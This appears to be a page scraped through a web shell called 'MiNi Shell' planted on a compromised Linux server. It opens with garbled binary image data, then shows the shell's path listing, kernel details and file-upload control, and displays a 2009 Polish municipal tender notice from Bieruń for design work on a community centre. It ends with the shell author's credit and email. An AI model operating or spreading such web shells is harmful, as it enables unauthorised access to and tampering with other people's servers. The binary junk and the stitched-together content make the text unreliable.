JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090424/119480-N-2009.html

<p class="kh_header"><b>Bieruń: ROZBUDOWA ŚWIETLICY ŚRODOWISKOWEJ PRZY UL. REMIZOWEJ W BIERUNIU NOWYM WRAZ Z ZAGOSPODAROWANIEM TERENU - WYKONANIEM DOKUMENTACJI PROJEKTOWEJ (ETAP I)</b><br>
<b>Numer ogłoszenia: 119480 - 2009; data zamieszczenia: 24.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROZBUDOWA ŚWIETLICY ŚRODOWISKOWEJ PRZY UL. REMIZOWEJ W BIERUNIU NOWYM WRAZ Z ZAGOSPODAROWANIEM TERENU - WYKONANIEM DOKUMENTACJI PROJEKTOWEJ (ETAP I).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompleksowej wielobranżowej dokumentacji projektowo- kosztorysowej rozbudowy Świetlicy Środowiskowej przy ul. Remizowej 21 w Bieruniu Nowym wraz                                               z zagospodarowaniem przyległego do niej terenu etap I oraz uzyskanie pozwolenia na budowę 
w imieniu i na rzecz Zamawiającego.

Teren, na którym zlokalizowana jest Świetlica Środowiskowa znajduje się we wschodniej części Bierunia Nowego, w kwartale pomiędzy ulicami: Remizową, Ofiar Oświęcimskich, Kosynierów 
i Kossaka.
Teren objęty zabudową i przeznaczony pod zagospodarowanie obejmuje obszar o powierzchni ponad 0,8 ha (działki nr: 1062/65, 882/65, 698/57, 699/57).
Powyższy teren jest objęty Miejscowym Planem Zagospodarowania Przestrzennego.
Istniejący budynek świetlicy posiada następujące parametry techniczne:
-   kubatura                           -   2 868 m3,
-   powierzchnia zabudowy   -      568 m2,
-   powierzchnia użytkowa    -      479 m2.
Budynek od strony wschodniej przylega bezpośrednio do budynku Remizy OSP.
Rozbudowa obiektu przewidziana jest od strony północnej istniejącego budynku.
Celem zamierzenia jest rozbudowa obiektu o pomieszczenia sceny z zapleczem, dwóch sal warsztatowych oraz węzła sanitarnego.
Zagospodarowanie terenu umożliwi jego wykorzystanie pod działalność kulturalno-rekreacyjną 
amfiteatr, plac zabaw wraz z infrastrukturą towarzyszącą w postaci ścieżek, placów, dróg wewnętrznych i miejsc parkingowych.
Część istniejącą budynku oraz dobudowaną należy traktować jako całość, tzn. w projekcie oraz 
w części kosztorysowej przewidzieć prace konieczne do wykonania, tak aby obie części stanowiły jeden obiekt np. należy przewidzieć odnowienie elewacji dla istniejącej części, remont pokrycia dachowego - jeśli będzie taka potrzeba, wymianę lub remont innych elementów w przypadku takiej konieczności, roboty malarskie, itp..
Właścicielem gruntów i obiektów na przedmiotowym obszarze jest Gmina Bieruń.
Użytkownikiem obiektu jest Bieruński Ośrodek Kultury.

Dokumentację projektową należy opracować na bazie koncepcji architektonicznej( RZEKA, która stanowi załącznik do SIWZ).
Zamawiający przejął prawa autorskie przysługujące koncepcji architektonicznej.
Wymagany zakres opracowania:
  1  uzyskanie aktualnych podkładów mapowych do celów projektowych, obejmujących swoim      
        zasięgiem teren niezbędny do realizacji inwestycji,
  2   uzyskanie wypisów i wyrysów z rejestru ewidencji gruntów,
  3   uzyskanie wypisu i wyrysu z Miejscowego Planu Zagospodarowania Przestrzennego,
  4   uzyskanie opinii OUG określającej szczegółowe uwarunkowania górnicze,
  5   wykonanie badań geotechnicznych gruntu pod rozbudowę,
  6   wykonanie inwentaryzacji budowlanej istniejącego obiektu,
  7   wykonanie wielobranżowej oceny stanu technicznego istniejącego obiektu w zakresie    
        potrzebnym do wykonania dokumentacji,
  8    wykonanie inwentaryzacji zieleni dendrologicznej,
  9    wykonanie wielobranżowej dokumentacji projektowej budowlano-wykonawczej 
        w tym projekty: architektury, konstrukcji, instalacji wod-kan, wentylacji, co., elektrycznej,   
        logicznej, telefonicznej, nagłośnienia, itp., aranżacji wnętrz - stosownie do potrzeb     
        użytkownika, projekty przyłączy i koniecznych przekładek sieci, zagospodarowania terenu, 
        zieleni,
10    opracowanie specyfikacji technicznych wykonania i odbioru robót,
11    podanie informacji dotyczących bezpieczeństwa i ochrony zdrowia,
12    wykonanie przedmiarów robót,
13    wykonanie kosztorysów inwestorskich,
14    uzyskanie wszelkich wymaganych prawem opinii, zgód, zatwierdzeń, decyzji, pozwoleń, 
        informacji, sprawdzeń, zgłoszeń, uzgodnień rzeczoznawców, niezbędnych do realizacji    
        zadania,
15    uzyskanie decyzji o pozwoleniu na budowę.

Dokumentację należy wykonać w formie projektu budowlanego i wykonawczego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 2 000 zł ( słownie: dwatysiącezłotych) musi być wniesione w terminie, który został podany w punkcie Terminy. 
Wadium wnoszone w pieniądzu należy przelać na rachunek Zamawiającego 
w BS O/Tychy numer konta: 26 8435 0004 0000 0000 6158 0001 z adnotacją: 
Wadium - nr sprawy: ZP- 3410/ 18 /09   Przetarg nieograniczony na wybór wykonawcy  
  dokumentacji projektowej  rozbudowy Świetlicy Środowiskowej przy ul. Remizowej w Bieruniu   
  Nowym wraz z zagospodarowaniem terenu (etap I). 


Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego 
w Bieruniu, nie później niż do godz. 12:00  w dniu otwarcia ofert. 
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-   
            kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)         w gwarancjach ubezpieczeniowych, 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt  2 ustawy 
       z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
       (Dz.U. Nr 109, poz. 1158 z późniejszymi zmianami)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W ubieganiu się o udzielenie zamówień mogą uczestniczyć Wykonawcy, którzy:
1)   spełniają wszystkie wymagania wynikające z oświadczeń, których listę przedstawiono 
      w  punkcie Wymagane oświadczenia oraz inne wymagania formalne określone SIWZ                        
      i ustawą;
2)   posiadają wiedzę i doświadczenie, tj. w okresie ostatnich trzech lat przed dniem wszczęcia 
      postępowania, a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, wykonali
      z należytą starannością co najmniej jedną dokumentację projektową budowy, przebudowy, 
      rozbudowy budynku użyteczności publicznej   w tym :
      - projekt budowlany, który uzyskał pozwolenie na budowę i projekt wykonawczy.
       Budynek użyteczności publicznej należy rozumieć zgodnie z definicją wskazaną § 3 pkt. 
       Rozporządzenia Ministra Infrastruktury z dnia  12 .04.2002 r. w sprawie warunków 
       technicznych, jakim powinny odpowiadać budynki i ich usytuowanie( Dz.U. z 2003 Nr 75, poz. 
      690 z późn. zm.),  
3)   Dysponują lub będą dysponować w okresie przewidzianym na realizację zamówienia osobami 
      zdolnymi do wykonania zamówienia, posiadającymi kwalifikacje zawodowe, a w szczególności 
      osobami posiadającymi uprawnienia w rozumieniu ustawy Prawo Budowlane z dnia   
      07.07.1994 r. (tekst jednolity: Dz.U. z 2006 r., nr 156, poz.1118 z późn. zmianami) oraz ustawy   
      z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz  
      urbanistów (Dz.U. z 2001 r., nr 5, poz. 42 z późn. zmianami) do projektowania bez ograniczeń 
      w specjalnościach:
      a)   architektonicznej,
      b)   konstrukcyjno- budowlanej,
      c)   instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wentylacyjnych, 
            wodociągowych i kanalizacyjnych,
      d)   instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
      e)   drogowej,
      posiadającymi aktualne zaświadczenie o przynależności do właściwej Izby Samorządu   
      Zawodowego, ważne na dzień składania ofert.

Ocena spełnienia warunków uczestnictwa w postępowaniu będzie dokonana wg zasady spełnia nie spełnia, na podstawie przedłożonych w ofercie dokumentów i oświadczeń w związku 
z wymaganiami określonymi  w SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy Wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1.   Oświadczenia z art. 22 ust. 1 oraz z art. 24 ust. 1 i ust. 2 pkt. 1 ustawy, że:
      1)   posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 
            ustawy nakładają obowiązek posiadania takich uprawnień;
 2)   posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym                        
       i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie 
        innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do 
        wykonania zamówienia;
 3)   znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
 4)   nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 pkt 1 ustawy.
2.   Oświadczenie, że  po zapoznaniu się z SIWZ  akceptuje ją bez zastrzeżeń.
3.   Oświadczenie, że będzie związany ofertą przez 30 dni od daty upływu terminu składania ofert, 
      a w przypadku wygrania przetargu zawrze umowę wg wzoru dołączonego do specyfikacji                      
      w  ciągu 14 dni od daty otrzymania zawiadomienia o wyborze oferty.
4.   Oferta jest jawna w całości/części. Strony oferty od ...... do ........ stanowią tajemnicę 
      przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej  konkurencji i nie mogą być 
      ujawnione innym uczestnikom postępowania  .
5.   Oświadczenie podmiotów występujących wspólnie (w przypadku ich uczestnictwa).
6.   Oświadczenie o wykonaniu zamówienia siłami własnymi /lub o powierzeniu wykonania części
      zamówienia podwykonawcom. 
Wzory oświadczeń  są dołączone do SIWZ.

Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu Wykonawcy, zgodnie z załączonym do oferty aktualnym wpisem do właściwych rejestrów (KRS) czy ewidencji działalności  gospodarczej lub odpowiednimi pełnomocnictwami. Pełnomocnictwa muszą zostać dołączone do oferty w formie oryginałów lub notarialnie poświadczonych kopi.

Od Wykonawców ubiegających się o przyznanie zamówienia wymagane jest, w celu 
potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy, przedstawienie 
wymienionych niżej dokumentów. Dokumenty te, zgodnie z obowiązującym w tym zakresie 
Rozporządzeniem  Prezesa Rady Ministrów z dnia 19 maja 2006r. (Dz. U. nr 87/2006, poz. 605 z późn.zm. ), mogą być przedstawione w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem (zaleca się poświadczenie każdej zapisanej strony dokumentu) przez  Wykonawcę  tzn. osobę (osoby) uprawnioną(e) do podpisania oferty:
1.   Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
 działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
 do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed 
 upływem terminu składania ofert.
2.   Wykaz wykonanych  z należytą starannością dokumentacji projektowych w okresie trzech lat   
      przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - to  
      w tym okresie.    
	Należy wykazać co najmniej 1 dokumentację projektową zgodną z warunkami podanymi 
	w pkt. VI. 2. ( patrz również zał.3 do SIWZ)
	Wykaz należy sporządzić wg wzoru tabeli stanowiącej załącznik do SIWZ.
3.   Dokumenty potwierdzające należytą staranność wykonania co najmniej 1 dokumentacji   
      projektowej z  podanych w wykazie usług.  
4.   Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca  i które będą uczestniczyć         
      w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do 
      wykonania zamówienia ( wg załącznika do SIWZ).
5.   Dokumenty potwierdzające posiadanie uprawnień przez osoby wymienione w wykazie osób, 
      o którym mowa powyżej - dla których są one wymagane.
6.   Zaświadczenia o  przynależności do Izby Samorządu Zawodowego, ważne na dzień składania   
      ofert, dla osób wymienionych w wykazie osób, o którym mowa powyżej - dla których są one   
      wymagane.
Jeżeli  Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 1 Listy wymaganych dokumentów przedstawia odpowiednio:
1.  pkt. 1 - dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce     zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości.

Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem, przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej (w dziale VIII), zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa w punkcie 1 niniejszej uwagi..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 43-150 Bieruń ul. Rynek 14 (Referat Zamówień Publicznych).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2009 godzina 12:00, miejsce: Urząd Miejski 43-150 Bieruń ul. Rynek 14 (Kancelaria - parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com